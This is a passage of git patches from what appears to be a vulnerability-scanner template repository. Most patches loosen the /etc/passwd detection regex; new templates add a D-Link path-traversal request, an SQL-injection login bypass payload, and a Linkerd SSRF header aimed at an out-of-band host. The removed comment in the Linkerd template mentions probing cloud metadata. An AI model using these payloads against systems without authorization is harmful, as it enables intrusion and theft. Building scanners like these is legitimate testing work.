a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 229cfc06fb..016743b0f8 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -18,4 +18,4 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index b8ba0eb246..5dec02f97b 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -22,7 +22,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "daemon:[x*]:0:0:" - "operator:[x*]:0:0:" part: body diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml index 8e58d848d4..a2bbd5d431 100644 --- a/cves/2021/CVE-2021-33564.yaml +++ b/cves/2021/CVE-2021-33564.yaml @@ -20,4 +20,4 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/fuzzing/arbitrary-file-read.yaml b/fuzzing/arbitrary-file-read.yaml index 34260c7053..0cb7b788f9 100644 --- a/fuzzing/arbitrary-file-read.yaml +++ b/fuzzing/arbitrary-file-read.yaml @@ -24,7 +24,7 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "\\[(font|extension|file)s\\]" condition: or part: body \ No newline at end of file diff --git a/fuzzing/directory-traversal.yaml b/fuzzing/directory-traversal.yaml index b3c1953cfd..b259a3668b 100644 --- a/fuzzing/directory-traversal.yaml +++ b/fuzzing/directory-traversal.yaml @@ -39,5 +39,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/fuzzing/generic-lfi-fuzzing.yaml b/fuzzing/generic-lfi-fuzzing.yaml index 7d89273e5d..e73b9d0496 100644 --- a/fuzzing/generic-lfi-fuzzing.yaml +++ b/fuzzing/generic-lfi-fuzzing.yaml @@ -22,5 +22,5 @@ requests: matchers: - type: regex words: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/fuzzing/header-command-injection.yaml b/fuzzing/header-command-injection.yaml index 7b1bc722e5..de1e04b0e9 100644 --- a/fuzzing/header-command-injection.yaml +++ b/fuzzing/header-command-injection.yaml @@ -33,4 +33,4 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/misconfiguration/d-link-arbitary-fileread.yaml b/misconfiguration/d-link-arbitary-fileread.yaml index 53753316a2..8c055aea9f 100644 --- a/misconfiguration/d-link-arbitary-fileread.yaml +++ b/misconfiguration/d-link-arbitary-fileread.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/vulnerabilities/apache/apache-solr-file-read.yaml b/vulnerabilities/apache/apache-solr-file-read.yaml index 5498883af7..eec12c37dc 100644 --- a/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/vulnerabilities/apache/apache-solr-file-read.yaml @@ -37,5 +37,5 @@ requests: - type: dsl dsl: - 'status_code_2 == 200' - - 'regex("root:[x*]:0:0:", body_2)' + - 'regex("root:.*:0:0:", body_2)' condition: and \ No newline at end of file diff --git a/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml b/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml index 307a2d8282..5945201731 100644 --- a/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml +++ b/vulnerabilities/ibm/ibm-infoprint-directory-traversal.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body diff --git a/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml index dddfa837bf..26c79550c9 100644 --- a/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml +++ b/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml @@ -18,5 +18,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml index 0f16521c04..66578482b4 100644 --- a/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml +++ b/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml @@ -19,5 +19,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/vulnerabilities/oscommerce/oscommerce-rce.yaml b/vulnerabilities/oscommerce/oscommerce-rce.yaml index 131e059877..bbc2bcfd66 100644 --- a/vulnerabilities/oscommerce/oscommerce-rce.yaml +++ b/vulnerabilities/oscommerce/oscommerce-rce.yaml @@ -34,7 +34,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index ff3069e324..9195b0191e 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml @@ -24,7 +24,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/vulnerabilities/other/flir-path-traversal.yaml b/vulnerabilities/other/flir-path-traversal.yaml index b5bf9d5913..596e30a0de 100644 --- a/vulnerabilities/other/flir-path-traversal.yaml +++ b/vulnerabilities/other/flir-path-traversal.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index a127111710..470a86869d 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -19,7 +19,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/hiboss-rce.yaml b/vulnerabilities/other/hiboss-rce.yaml index 57baac3109..95572c2656 100644 --- a/vulnerabilities/other/hiboss-rce.yaml +++ b/vulnerabilities/other/hiboss-rce.yaml @@ -28,7 +28,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml index d12090b6ae..89620cd0e4 100644 --- a/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml +++ b/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml @@ -34,7 +34,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "bit app support" condition: or diff --git a/vulnerabilities/other/huawei-hg659-lfi.yaml b/vulnerabilities/other/huawei-hg659-lfi.yaml index 9ecdf99635..db6b65b82f 100644 --- a/vulnerabilities/other/huawei-hg659-lfi.yaml +++ b/vulnerabilities/other/huawei-hg659-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and - type: status diff --git a/vulnerabilities/other/huijietong-cloud-fileread.yaml b/vulnerabilities/other/huijietong-cloud-fileread.yaml index 085d818692..8b2dc50919 100644 --- a/vulnerabilities/other/huijietong-cloud-fileread.yaml +++ b/vulnerabilities/other/huijietong-cloud-fileread.yaml @@ -16,7 +16,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/interlib-fileread.yaml b/vulnerabilities/other/interlib-fileread.yaml index 11298f21e8..ff2833281d 100644 --- a/vulnerabilities/other/interlib-fileread.yaml +++ b/vulnerabilities/other/interlib-fileread.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - "for 16-bit app support" condition: or diff --git a/vulnerabilities/other/jeewms-lfi.yaml b/vulnerabilities/other/jeewms-lfi.yaml index 6fcc22e08f..14c348eee1 100644 --- a/vulnerabilities/other/jeewms-lfi.yaml +++ b/vulnerabilities/other/jeewms-lfi.yaml @@ -26,7 +26,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - "\\[(font|extension|file)s\\]" condition: or part: body diff --git a/vulnerabilities/other/landray-oa-fileread.yaml b/vulnerabilities/other/landray-oa-fileread.yaml index 352a679cc0..03348be0ca 100644 --- a/vulnerabilities/other/landray-oa-fileread.yaml +++ b/vulnerabilities/other/landray-oa-fileread.yaml @@ -38,7 +38,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "for 16-bit app support" condition: or diff --git a/vulnerabilities/other/magicflow-lfi.yaml b/vulnerabilities/other/magicflow-lfi.yaml index 9cd36ae32a..19f61c01ef 100644 --- a/vulnerabilities/other/magicflow-lfi.yaml +++ b/vulnerabilities/other/magicflow-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/mpsec-lfi.yaml b/vulnerabilities/other/mpsec-lfi.yaml index 2c7c9b0abc..b4eb79eedc 100644 --- a/vulnerabilities/other/mpsec-lfi.yaml +++ b/vulnerabilities/other/mpsec-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - "for 16-bit app support" - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body condition: or diff --git a/vulnerabilities/other/myucms-lfr.yaml b/vulnerabilities/other/myucms-lfr.yaml index f7ecb3e8de..9b0197070e 100644 --- a/vulnerabilities/other/myucms-lfr.yaml +++ b/vulnerabilities/other/myucms-lfr.yaml @@ -13,4 +13,4 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml index 4cf1d909e0..a307387379 100644 --- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml +++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml @@ -21,7 +21,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "app.listen" part: body condition: or diff --git a/vulnerabilities/other/ns-asg-file-read.yaml b/vulnerabilities/other/ns-asg-file-read.yaml index 2f34341723..60008dd594 100644 --- a/vulnerabilities/other/ns-asg-file-read.yaml +++ b/vulnerabilities/other/ns-asg-file-read.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index 9b9f302c43..889fd93cff 100644 --- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -19,5 +19,5 @@ requests: - 200 - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body diff --git a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index b31d9175af..aae82c8c57 100644 --- a/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -25,7 +25,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status diff --git a/vulnerabilities/other/rce-shellshock-user-agent.yaml b/vulnerabilities/other/rce-shellshock-user-agent.yaml index 69c2eaf5e4..ddca7fb8fe 100644 --- a/vulnerabilities/other/rce-shellshock-user-agent.yaml +++ b/vulnerabilities/other/rce-shellshock-user-agent.yaml @@ -15,5 +15,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body \ No newline at end of file diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 3a7f4ecb64..492b2c3fe9 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -30,7 +30,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - "nobody:x:0:0:" part: body diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/other/sangfor-edr-rce.yaml index 29383f9e3f..7c5966f8a2 100644 --- a/vulnerabilities/other/sangfor-edr-rce.yaml +++ b/vulnerabilities/other/sangfor-edr-rce.yaml @@ -20,7 +20,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index 68bfa3a63a..da355a03d4 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -48,6 +48,6 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" condition: and part: body diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index cbf28972e5..5f2afa5a6d 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -23,7 +23,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" part: body - type: status status: diff --git a/vulnerabilities/other/tamronos-rce.yaml b/vulnerabilities/other/tamronos-rce.yaml index f082e5ce35..03c27beac8 100644 --- a/vulnerabilities/other/tamronos-rce.yaml +++ b/vulnerabilities/other/tamronos-rce.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index e7ad5c1b20..0d124b59f7 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -102,7 +102,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body - type: status diff --git a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 7194cb591b..17b89f72fa 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -16,8 +16,8 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" - - "bin:[x]:1:1" + - "root:.*:0:0" + - "bin:.*:1:1" part: body - type: status status: diff --git a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index e39424359d..801ec50137 100644 --- a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -17,9 +17,10 @@ requests: matchers: - type: regex regex: - - "root:[0*]:0:0" - - "bin:[x]:1:1" + - "root:.*:0:0" + - "bin:.*:1:1" part: body + - type: status status: - 200 diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml index 843f126292..6b37ffa8ff 100644 --- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml +++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" - "bit app support" - type: status diff --git a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml index d730bafdc6..94a0aa150e 100644 --- a/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml +++ b/vulnerabilities/wordpress/wordpress-wordfence-lfi.yaml @@ -18,7 +18,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: diff --git a/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml b/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml index 2846ae8107..e26d5566c9 100644 --- a/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml +++ b/vulnerabilities/wordpress/wp-simple-fields-lfi.yaml @@ -15,5 +15,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body \ No newline at end of file diff --git a/vulnerabilities/wordpress/wp-tutor-lfi.yaml b/vulnerabilities/wordpress/wp-tutor-lfi.yaml index 15a67c9e24..9214a5fa94 100644 --- a/vulnerabilities/wordpress/wp-tutor-lfi.yaml +++ b/vulnerabilities/wordpress/wp-tutor-lfi.yaml @@ -15,5 +15,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body \ No newline at end of file diff --git a/vulnerabilities/wordpress/wp-vault-lfi.yaml b/vulnerabilities/wordpress/wp-vault-lfi.yaml index 5bb4ba6ef0..0bb54330d9 100644 --- a/vulnerabilities/wordpress/wp-vault-lfi.yaml +++ b/vulnerabilities/wordpress/wp-vault-lfi.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: From 9883f040922e8537957816853474f17900839b99 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 25 Jul 2021 05:49:24 +0700 Subject: [PATCH 1113/4083] Create CVE-2018-10822.yaml --- cves/2018/CVE-2018-10822.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2018/CVE-2018-10822.yaml diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml new file mode 100644 index 0000000000..9e7ac5e155 --- /dev/null +++ b/cves/2018/CVE-2018-10822.yaml @@ -0,0 +1,27 @@ +id: CVE-2018-10822 + +info: + name: D-Link Routers - Directory Traversal + author: daffainfo + severity: medium + description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. + reference: | + - https://www.exploit-db.com/exploits/45678 + - https://www.cvedetails.com/cve/CVE-2018-10822 + tags: cve,cve2018,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/uir//etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From b9fadff659239bd88e40b322617db1c110de22df Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 25 Jul 2021 11:50:53 +0900 Subject: [PATCH 1114/4083] Create CVE-2020-5307.yaml PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-5307.yaml | 34 ++++++++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 cves/2020/CVE-2020-5307.yaml diff --git a/cves/2020/CVE-2020-5307.yaml b/cves/2020/CVE-2020-5307.yaml new file mode 100644 index 0000000000..55fcfc1b84 --- /dev/null +++ b/cves/2020/CVE-2020-5307.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-5307 + +info: + name: Dairy Farm Shop Management System - SQL Injection + author: gy741 + description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php. + reference: | + - https://cinzinga.com/CVE-2020-5307-5308/ + severity: critical + tags: cve,cve2020,sqli + +requests: + - raw: + - | + POST /dfsms/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Connection: close + Content-Length: 66 + + username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login= + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "add-category.php" + + - type: status + status: + - 302 From cff60a04b53d0958730e02fbc4454138beb4b06e Mon Sep 17 00:00:00 2001 From: Pham Sy Minh <59408894+shelld3v@users.noreply.github.com> Date: Sun, 25 Jul 2021 12:14:24 +0700 Subject: [PATCH 1115/4083] Fix false positive --- misconfiguration/linkerd-ssrf-detect.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml index fa0c0b7bd7..7a6578dc4d 100644 --- a/misconfiguration/linkerd-ssrf-detect.yaml +++ b/misconfiguration/linkerd-ssrf-detect.yaml @@ -30,12 +30,6 @@ requests: matchers-condition: or matchers: - - type: regex - name: via-linkerd-present - regex: - - '(?mi)^Via\s*?:.*?linkerd.*$' - part: header - - type: regex name: l5d-err-present regex: From bb8a22401bce8d370f6d467b7eff183a92920054 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 25 Jul 2021 15:22:09 +0530 Subject: [PATCH 1116/4083] Separating service detection + SSRF detection --- misconfiguration/linkerd-ssrf-detect.yaml | 54 +++-------------------- technologies/linkerd-service-detect.yaml | 32 ++++++++++++++ 2 files changed, 39 insertions(+), 47 deletions(-) create mode 100644 technologies/linkerd-service-detect.yaml diff --git a/misconfiguration/linkerd-ssrf-detect.yaml b/misconfiguration/linkerd-ssrf-detect.yaml index 7a6578dc4d..2eff47e123 100644 --- a/misconfiguration/linkerd-ssrf-detect.yaml +++ b/misconfiguration/linkerd-ssrf-detect.yaml @@ -1,61 +1,21 @@ -id: linkerd-ssrf-detect - -# Detect the Linkerd service by overriding the delegation table and -# inspect the response for: -# - a "Via: .. linkerd .." -# - a "l5d-err" and/or a "l5d-success" header -# - a verbose timeout error (binding timeout) -# - a full response -# The full-response case indicates a possible SSRF condition, the others -# only indicates the service presence. -# -# If a full-response is returned you should really manually probe requests with -# the following header values: -# -# - "l5d-dtab: /svc/* => /$/inet/yourserver.com/80", to get to other external hosts -# - "l5d-dtab: /svc/* => /$/inet/169.254.169.254/80", to get to cloud metadata +id: linkerd-ssrf-detection info: name: Linkerd SSRF detection author: dudez - severity: info - tags: ssrf,linkerd + severity: high + tags: ssrf,linkerd,oob + reference: https://twitter.com/nirvana_msu/status/1084144955034165248 requests: - method: GET path: - "{{BaseURL}}" headers: - l5d-dtab: /svc/* => /$/inet/example.com/443 + l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443 - matchers-condition: or matchers: - - type: regex - name: l5d-err-present - regex: - - '(?mi)^l5d-err:.*$' - part: header - - - type: regex - name: l5d-success-class-present - regex: - - '(?mi)^l5d-success-class: 0.*$' - part: header - - type: word - name: ssrf-response-body + part: interactsh_protocol # Confirms the HTTP Interaction words: - - '

    This domain is for use in illustrative examples in documents.' - part: body - - - type: regex - name: resolve-timeout-error-present - regex: - - '(?mi)Exceeded .*? binding timeout while resolving name' - part: body - - - type: regex - name: dynbind-error-present - regex: - - '(?mi)exceeded .*? to unspecified while dyn binding' - part: body + - "http" \ No newline at end of file diff --git a/technologies/linkerd-service-detect.yaml b/technologies/linkerd-service-detect.yaml new file mode 100644 index 0000000000..3060e058eb --- /dev/null +++ b/technologies/linkerd-service-detect.yaml @@ -0,0 +1,32 @@ +id: linkerd-service-detect + +info: + name: Linkerd Service detection + author: dudez + severity: info + tags: tech,linkerd + reference: https://twitter.com/nirvana_msu/status/1084144955034165248 + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + l5d-dtab: /svc/* => /$/inet/example.com/443 + + matchers-condition: or + matchers: + - type: regex + regex: + - '(?mi)^l5d-err:.*$' + - '(?mi)^l5d-success-class: 0.*$' + - '(?mi)^Via\s*?:.*?linkerd.*$' + part: header + condition: or + + - type: regex + regex: + - '(?mi)Exceeded .*? binding timeout while resolving name' + - '(?mi)exceeded .*? to unspecified while dyn binding' + part: body + condition: or \ No newline at end of file From 355dc8e39be5add4c750347bb4c4053675e923d3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 25 Jul 2021 19:38:25 +0530 Subject: [PATCH 1117/4083] typo update --- technologies/redcap-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/redcap-detector.yaml b/technologies/redcap-detector.yaml index 5bfb15764b..a3619bb47c 100644 --- a/technologies/redcap-detector.yaml +++ b/technologies/redcap-detector.yaml @@ -11,7 +11,7 @@ requests: path: - "{{BaseURL}}" - matcher-condition: and + matchers-condition: and matchers: - type: word words: From 41c41abdb7f6721b28647c73a7fb830dd2870739 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 25 Jul 2021 18:29:28 +0000 Subject: [PATCH 1118/4083] Update exposed-gitignore.yaml Fixes the issue here: https://github.com/projectdiscovery/nuclei-templates/issues/1898#issuecomment-886237512 --- exposures/configs/exposed-gitignore.yaml | 14 +------------- 1 file changed, 1 insertion(+), 13 deletions(-) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index 61812fd088..b0e830009c 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -18,18 +18,6 @@ requests: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: dsl dsl: - - '!contains(tolower(body), " 50 " + - '!contains(tolower(body), " 50' From c9f5f01bb9c6c9fa0f038e91104922f7b8d63077 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 00:39:16 +0530 Subject: [PATCH 1119/4083] minor update --- exposures/configs/exposed-gitignore.yaml | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index b0e830009c..38e3dfb918 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -20,4 +20,11 @@ requests: matchers: - type: dsl dsl: - - '!contains(tolower(body), " 50' + - '!contains(tolower(body), " 50' + - 'status_code == 200' + condition: and \ No newline at end of file From 0d2e18722af79853594c358aabdc88b9b808962e Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:04:31 +0530 Subject: [PATCH 1120/4083] Update CVE-2018-10822.yaml --- cves/2018/CVE-2018-10822.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2018/CVE-2018-10822.yaml b/cves/2018/CVE-2018-10822.yaml index 9e7ac5e155..17410d6679 100644 --- a/cves/2018/CVE-2018-10822.yaml +++ b/cves/2018/CVE-2018-10822.yaml @@ -3,12 +3,12 @@ id: CVE-2018-10822 info: name: D-Link Routers - Directory Traversal author: daffainfo - severity: medium + severity: high description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. reference: | - https://www.exploit-db.com/exploits/45678 - - https://www.cvedetails.com/cve/CVE-2018-10822 - tags: cve,cve2018,lfi,router + - https://nvd.nist.gov/vuln/detail/CVE-2018-10822 + tags: cve,cve2018,lfi,router,dlink requests: - method: GET From 037c531d58659da4c0005e8257d416b40782b183 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:15:39 +0530 Subject: [PATCH 1121/4083] Update cold-fusion-cfcache-map.yaml --- exposures/files/cold-fusion-cfcache-map.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/files/cold-fusion-cfcache-map.yaml b/exposures/files/cold-fusion-cfcache-map.yaml index 98be58c743..4a91d2f2be 100644 --- a/exposures/files/cold-fusion-cfcache-map.yaml +++ b/exposures/files/cold-fusion-cfcache-map.yaml @@ -5,7 +5,7 @@ info: reference: https://securiteam.com/windowsntfocus/5bp081f0ac/ author: geeknik severity: low - tags: disclosure,coldfusion,adobe + tags: exposure,coldfusion,adobe requests: - method: GET @@ -19,6 +19,7 @@ requests: - "Mapping=" - "SourceTimeStamp=" condition: and + - type: status status: - 200 From d43b57b56ae38d42035967b5436f90871ac2f39c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 01:21:43 +0530 Subject: [PATCH 1122/4083] Update wp-app-log.yaml --- exposures/logs/wp-app-log.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/logs/wp-app-log.yaml b/exposures/logs/wp-app-log.yaml index 77e98f67c9..b1c8817b08 100644 --- a/exposures/logs/wp-app-log.yaml +++ 